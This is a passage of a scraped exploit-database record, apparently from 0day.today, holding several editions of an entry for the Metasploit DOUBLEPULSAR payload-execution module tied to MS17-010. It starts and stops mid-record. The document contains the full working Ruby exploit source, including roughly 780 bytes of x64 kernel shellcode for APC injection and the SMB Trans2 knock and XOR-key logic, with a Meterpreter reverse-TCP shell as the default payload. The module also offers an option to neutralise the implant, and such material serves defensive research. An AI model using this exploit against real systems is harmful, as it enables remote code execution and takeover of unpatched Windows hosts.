\"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-27] #"}, "lastseen": "2021-10-26T22:29:31", "differentElements": ["sourceData"], "edition": 57}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "b85d525ce7f749dde47247381fb5b32c", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-27T22:19:46", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:42031", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27802", 
"1337DAY-ID-33895", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:142602"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}], "modified": "2021-10-27T22:19:46", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-10-27T22:19:46", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => 
true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-28] #"}, "lastseen": "2021-10-27T22:19:46", "differentElements": ["sourceData"], "edition": 58}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "0ae5dacf994a748df2f42478cbdfb064", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-28T22:18:51", "history": [], "viewCount": 